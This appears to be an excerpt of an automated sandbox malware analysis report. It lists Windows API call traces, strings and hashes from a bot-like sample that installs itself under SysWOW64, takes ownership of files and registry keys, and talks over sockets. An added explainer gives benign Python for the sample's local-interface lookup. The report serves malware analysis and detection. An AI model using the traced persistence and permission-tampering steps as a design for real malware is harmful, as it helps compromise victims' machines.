                                                                                        • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                        • Instruction ID: 1e7b7d7e48e8582de938d5ac85168ac64198426bf637d23b9596522d23fedd3d
                                                                                        • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                        • Instruction Fuzzy Hash: E6111E72A0011CEBEF11CFD4DC84ADEF7BDAB04715F1455A6E901E6294E7749B88CBA0
                                                                                        APIs
                                                                                          • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                          • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                        • GetComputerNameA.KERNEL32(?,0000000F), ref: 00401BA3
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 2777991786-1857712256
                                                                                        • Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                        • Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
                                                                                        • Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                        • Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1
                                                                                        APIs
                                                                                        • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
                                                                                        • InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: IncrementInterlockedlstrcpyn
                                                                                        • String ID: %FROM_EMAIL
                                                                                        • API String ID: 224340156-2903620461
                                                                                        • Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                        • Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
                                                                                        • Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                        • Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96
                                                                                        APIs
                                                                                        • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
                                                                                        • inet_ntoa.WS2_32(?), ref: 004026E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbyaddrinet_ntoa
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 2112563974-1857712256
                                                                                        • Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                        • Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
                                                                                        • Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                        • Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(00000001), ref: 00402693
                                                                                        • gethostbyname.WS2_32(00000001), ref: 0040269F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbynameinet_addr
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 1594361348-2401304539
                                                                                        • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
                                                                                        • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,7508EA50,80000001,00000000), ref: 0040EAF2
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040EB07
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: ntdll.dll
                                                                                        • API String ID: 2574300362-2227199552
                                                                                        • Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                        • Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
                                                                                        • Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                        • Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C
                                                                                        APIs
                                                                                          • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,759223A0,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                          • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00402F7A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1017166417-0
                                                                                        • Opcode ID: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                        • Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
                                                                                        • Opcode Fuzzy Hash: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                        • Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88
                                                                                        APIs
                                                                                          • Part of subcall function 02D72F88: GetModuleHandleA.KERNEL32(?), ref: 02D72FA1
                                                                                          • Part of subcall function 02D72F88: LoadLibraryA.KERNEL32(?), ref: 02D72FB1
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D731DA
                                                                                        • HeapFree.KERNEL32(00000000), ref: 02D731E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1017166417-0
                                                                                        • Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                        • Instruction ID: 634a3a2d03939779a4bc9ac3e6d5dc85ee10c56fdf1a875cf876cdf945d9fb02
                                                                                        • Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                        • Instruction Fuzzy Hash: 6951997190024AAFCB119F64D888AEAB7B5FF15305F2481A9EC9687310F736DE19CB90
                                                                                        APIs
                                                                                        • closesocket.WS2_32(?), ref: 030FCA4E
                                                                                        • closesocket.WS2_32(?), ref: 030FCB63
                                                                                        • GetTempPathA.KERNEL32(00000120,?), ref: 030FCC28
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 030FCCB4
                                                                                        • WriteFile.KERNEL32(030FA4B3,?,-000000E8,?,00000000), ref: 030FCCDC
                                                                                        • CloseHandle.KERNEL32(030FA4B3), ref: 030FCCED
                                                                                        • wsprintfA.USER32 ref: 030FCD21
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 030FCD77
                                                                                        • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 030FCD89
                                                                                        • CloseHandle.KERNEL32(?), ref: 030FCD98
                                                                                        • CloseHandle.KERNEL32(?), ref: 030FCD9D
                                                                                        • DeleteFileA.KERNEL32(?), ref: 030FCDC4
                                                                                        • CloseHandle.KERNEL32(030FA4B3), ref: 030FCDCC
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 030FCFB1
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 030FCFEF
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 030FD033
                                                                                        • lstrcatA.KERNEL32(?,04700108), ref: 030FD10C
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080), ref: 030FD155
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 030FD171
                                                                                        • WriteFile.KERNEL32(00000000,0470012C,?,?,00000000), ref: 030FD195
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 030FD19C
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002), ref: 030FD1C8
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 030FD231
                                                                                        • lstrcatA.KERNEL32(?,04700108,?,?,?,?,?,?,?,00000100), ref: 030FD27C
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 030FD2AB
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 030FD2C7
                                                                                        • WriteFile.KERNEL32(00000000,0470012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 030FD2EB
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 030FD2F2
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 030FD326
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 030FD372
                                                                                        • lstrcatA.KERNEL32(?,04700108,?,?,?,?,?,?,?,00000100), ref: 030FD3BD
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 030FD3EC
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 030FD408
                                                                                        • WriteFile.KERNEL32(00000000,0470012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 030FD428
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 030FD42F
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 030FD45B
                                                                                        • CreateProcessA.KERNEL32(?,03100264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 030FD4DE
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 030FD4F4
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 030FD4FC
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 030FD513
                                                                                        • closesocket.WS2_32(?), ref: 030FD56C
                                                                                        • Sleep.KERNEL32(000003E8), ref: 030FD577
                                                                                        • ExitProcess.KERNEL32 ref: 030FD583
                                                                                        • wsprintfA.USER32 ref: 030FD81F
                                                                                          • Part of subcall function 030FC65C: send.WS2_32(00000000,?,00000000), ref: 030FC74B
                                                                                        • closesocket.WS2_32(?), ref: 030FDAD5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
                                                                                        • String ID: .dat$.sys$4$@$C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
                                                                                        • API String ID: 562065436-334654071
                                                                                        • Opcode ID: ac30cc3ab36c909afff80b318b80e9ec9c089251729b6f8c5a1c993da83f7151
                                                                                        • Instruction ID: dbfafcf03839bec3f4af05c494f98703a5f8c94961ddf35a0e3e3defc626de5c
                                                                                        • Opcode Fuzzy Hash: ac30cc3ab36c909afff80b318b80e9ec9c089251729b6f8c5a1c993da83f7151
                                                                                        • Instruction Fuzzy Hash: EAB2D575902209AFEB54EFA4DD49FEEBBBCEB4C304F080469E705A7544D7B09A85CB60
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00000003), ref: 030F9A7F
                                                                                        • SetErrorMode.KERNELBASE(00000003), ref: 030F9A83
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(030F6511), ref: 030F9A8A
                                                                                          • Part of subcall function 030FEC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 030FEC5E
                                                                                          • Part of subcall function 030FEC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 030FEC72
                                                                                          • Part of subcall function 030FEC54: GetTickCount.KERNEL32 ref: 030FEC78
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 030F9AB3
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 030F9ABA
                                                                                        • GetCommandLineA.KERNEL32 ref: 030F9AFD
                                                                                        • lstrlenA.KERNEL32(?), ref: 030F9B99
                                                                                        • ExitProcess.KERNEL32 ref: 030F9C06
                                                                                        • GetTempPathA.KERNEL32(000001F4,?), ref: 030F9CAC
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 030F9D7A
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 030F9D8B
                                                                                        • lstrcatA.KERNEL32(?,0310070C), ref: 030F9D9D
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 030F9DED
                                                                                        • DeleteFileA.KERNEL32(00000022), ref: 030F9E38
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 030F9E6F
                                                                                        • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 030F9EC8
                                                                                        • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 030F9ED5
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 030F9F3B
                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 030F9F5E
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 030F9F6A
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 030F9FAD
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 030F9FB4
                                                                                        • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 030F9FFE
                                                                                        • lstrcatA.KERNEL32(00000022,00000000), ref: 030FA038
                                                                                        • lstrcatA.KERNEL32(00000022,03100A34), ref: 030FA05E
                                                                                        • lstrcatA.KERNEL32(00000022,00000022), ref: 030FA072
                                                                                        • lstrcatA.KERNEL32(00000022,03100A34), ref: 030FA08D
                                                                                        • wsprintfA.USER32 ref: 030FA0B6
                                                                                        • lstrcatA.KERNEL32(00000022,00000000), ref: 030FA0DE
                                                                                        • lstrcatA.KERNEL32(00000022,?), ref: 030FA0FD
                                                                                        • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 030FA120
                                                                                        • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 030FA131
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 030FA174
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 030FA17B
                                                                                        • GetDriveTypeA.KERNEL32(00000022), ref: 030FA1B6
                                                                                        • GetCommandLineA.KERNEL32 ref: 030FA1E5
                                                                                          • Part of subcall function 030F99D2: lstrcpyA.KERNEL32(?,?,00000100,031022F8,00000000,?,030F9E9D,?,00000022,?,?,?,?,?,?,?), ref: 030F99DF
                                                                                          • Part of subcall function 030F99D2: lstrcatA.KERNEL32(00000022,00000000,?,?,030F9E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 030F9A3C
                                                                                          • Part of subcall function 030F99D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,030F9E9D,?,00000022,?,?,?), ref: 030F9A52
                                                                                        • lstrlenA.KERNEL32(?), ref: 030FA288
                                                                                        • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 030FA3B7
                                                                                        • GetLastError.KERNEL32 ref: 030FA3ED
                                                                                        • Sleep.KERNEL32(000003E8), ref: 030FA400
                                                                                        • DeleteFileA.KERNELBASE(031033D8), ref: 030FA407
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,030F405E,00000000,00000000,00000000), ref: 030FA42C
                                                                                        • WSAStartup.WS2_32(00001010,?), ref: 030FA43A
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,030F877E,00000000,00000000,00000000), ref: 030FA469
                                                                                        • Sleep.KERNELBASE(00000BB8), ref: 030FA48A
                                                                                        • GetTickCount.KERNEL32 ref: 030FA49F
                                                                                        • GetTickCount.KERNEL32 ref: 030FA4B7
                                                                                        • Sleep.KERNELBASE(00001A90), ref: 030FA4C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                        • String ID: "$"$"$%X%08X$C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$D$P$\$ycgeofkw
                                                                                        • API String ID: 2089075347-209952241
                                                                                        • Opcode ID: 365d81e68e71fbafb3c00c096fe84be058e2abc3062fea915c78848915b7ef4d
                                                                                        • Instruction ID: d479ffcf39b933f7d3e0d99dad096aa026420469fa170a1ca074d91eba9dd89e
                                                                                        • Opcode Fuzzy Hash: 365d81e68e71fbafb3c00c096fe84be058e2abc3062fea915c78848915b7ef4d
                                                                                        • Instruction Fuzzy Hash: 185293B1D42359AFDB11EBA4DC48FEE77BCAF48304F1844A5E709E6541E7709A848F60
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(123.45.67.89), ref: 030F19B1
                                                                                        • LoadLibraryA.KERNELBASE(Iphlpapi.dll,?,?,?,?,00000001,030F1E9E), ref: 030F19BF
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 030F19E2
                                                                                        • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 030F19ED
                                                                                        • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 030F19F9
                                                                                        • GetBestInterface.IPHLPAPI(?,?,?,?,?,?,00000001,030F1E9E), ref: 030F1A1B
                                                                                        • GetProcessHeap.KERNEL32(?,?,?,?,00000001,030F1E9E), ref: 030F1A1D
                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,030F1E9E), ref: 030F1A36
                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,030F1E9E,?,?,?,?,00000001,030F1E9E), ref: 030F1A4A
                                                                                        • HeapReAlloc.KERNEL32(?,00000000,00000000,030F1E9E,?,?,?,?,00000001,030F1E9E), ref: 030F1A5A
                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,030F1E9E,?,?,?,?,00000001,030F1E9E), ref: 030F1A6E
                                                                                        • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,030F1E9E), ref: 030F1A9B
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,030F1E9E), ref: 030F1AA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressProc$AdaptersAllocFreeInfoLibrary$BestInterfaceLoadProcessinet_addr
                                                                                        • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                        • API String ID: 293628436-270533642
                                                                                        • Opcode ID: c14893ea09ef65ef06083b5a40dfdf2e25f397ac82aff83122f8a050e5203176
                                                                                        • Instruction ID: 1b58af5de01ece5a46f5493ca62c798a33c64d7792fd2937dd34f687ac392b7d
                                                                                        • Opcode Fuzzy Hash: c14893ea09ef65ef06083b5a40dfdf2e25f397ac82aff83122f8a050e5203176
                                                                                        • Instruction Fuzzy Hash: 50315431D01159EFCB55EFE4CC889BEBBF9EF4D255B184679E601A2500D7708940CB60
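Reading aid for the function above, added here and not part of the Joe Sandbox report or of the sample: it loads Iphlpapi.dll by hand, resolves GetAdaptersInfo, GetIfEntry and GetBestInterface, and calls GetBestInterface with inet_addr("123.45.67.89"); the HeapAlloc, GetAdaptersInfo, HeapReAlloc, GetAdaptersInfo sequence that follows is the standard buffer-size retry for that API. The address is only a probe that drives a routing-table lookup, no packet goes to it, so the literal 123.45.67.89 is a good string to hunt for in memory dumps but not an address worth alerting on in network telemetry. The Python below shows the portable form of the same lookup (a connected UDP socket, which also transmits nothing) and what such code learns about the host. The function names, the classify() buckets and the discard-port choice are this example's own; PROBE_ADDRESS is the constant from the listing.

```python
"""Portable form of the local-interface lookup traced at 030F19B1 above (added example)."""
import ipaddress
import socket
from typing import Dict, Optional

# The literal the sample hands to inet_addr() and then GetBestInterface(). It is never
# contacted: the Win32 call, like the UDP connect() below, only asks the routing table
# which local interface would be used to reach it.
PROBE_ADDRESS = "123.45.67.89"


def outbound_local_ip(probe: str = PROBE_ADDRESS) -> Optional[str]:
    """Source address the kernel would use for `probe`, or None when there is no route.

    connect() on a SOCK_DGRAM socket transmits nothing; it records the destination,
    resolves the route and binds the local end, which getsockname() then reports. That
    is the information GetBestInterface() + GetAdaptersInfo() yield on Windows.
    """
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect((probe, 9))  # port is irrelevant to the route lookup
            return s.getsockname()[0]
    except OSError:  # ENETUNREACH and friends: an isolated sandbox has no route at all
        return None


def classify(ip: str) -> str:
    """Bucket an address: loopback, private (RFC 1918 and link-local 169.254/16) or public."""
    try:
        addr = ipaddress.IPv4Address(ip)
    except ipaddress.AddressValueError:
        return "invalid"
    if addr.is_loopback:
        return "loopback"
    return "private" if addr.is_private else "public"


def local_address_report(probe: str = PROBE_ADDRESS) -> Dict[str, Optional[str]]:
    """What code using this trick learns about the host it runs on."""
    ip = outbound_local_ip(probe)
    return {"probe": probe, "local_ip": ip, "kind": classify(ip) if ip else "no-route"}
```

A private result with working Internet access means the host sits behind NAT, which is the usual reason a bot performs this lookup before reporting in; on a machine with no route at all the function returns None, the same outcome the sample gets when GetBestInterface fails.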
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 030F7ABA
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 030F7ADF
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,0310070C,?,?,?), ref: 030F7B16
                                                                                        • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 030F7B3B
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 030F7B59
                                                                                        • EqualSid.ADVAPI32(?,00000022), ref: 030F7B6A
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 030F7B7E
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 030F7B8C
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 030F7B9C
                                                                                        • RegSetKeySecurity.KERNELBASE(00000000,00000001,00000000), ref: 030F7BAB
                                                                                        • LocalFree.KERNEL32(00000000), ref: 030F7BB2
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,030F7FC9,?,00000000), ref: 030F7BCE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                        • String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$D
                                                                                        • API String ID: 2976863881-3037353064
                                                                                        • Opcode ID: c891277f92610de8f833cd5edff76b88fe01a1c21e10564d3f4f8f4a928a118f
                                                                                        • Instruction ID: 4b2234520365fe07b20fdcb38bdc365d78bd6f8a985493ddfff5f0d26de2f016
                                                                                        • Opcode Fuzzy Hash: c891277f92610de8f833cd5edff76b88fe01a1c21e10564d3f4f8f4a928a118f
                                                                                        • Instruction Fuzzy Hash: 9AA15871901219AFDB51DFA0CD88FEEBBBDFF48B84F088069E605E2144D7758A85CB61
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 030F782F
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 030F7866
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 030F7878
                                                                                        • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 030F789A
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,030F7F63,?), ref: 030F78B8
                                                                                        • EqualSid.ADVAPI32(?,030F7F63), ref: 030F78D2
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 030F78E3
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 030F78F1
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 030F7901
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 030F7910
                                                                                        • LocalFree.KERNEL32(00000000), ref: 030F7917
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 030F7933
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 030F7963
                                                                                        • EqualSid.ADVAPI32(?,030F7F63), ref: 030F798A
                                                                                        • DeleteAce.ADVAPI32(?,00000000), ref: 030F79A3
                                                                                        • EqualSid.ADVAPI32(?,030F7F63), ref: 030F79C5
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 030F7A4A
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 030F7A58
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 030F7A69
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 030F7A79
                                                                                        • LocalFree.KERNEL32(00000000), ref: 030F7A87
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                        • String ID: D
                                                                                        • API String ID: 3722657555-2746444292
                                                                                        • Opcode ID: b32e78c839a30f2d4cc9a7943ed2d968975b2311285d2b410b102ee03917ac64
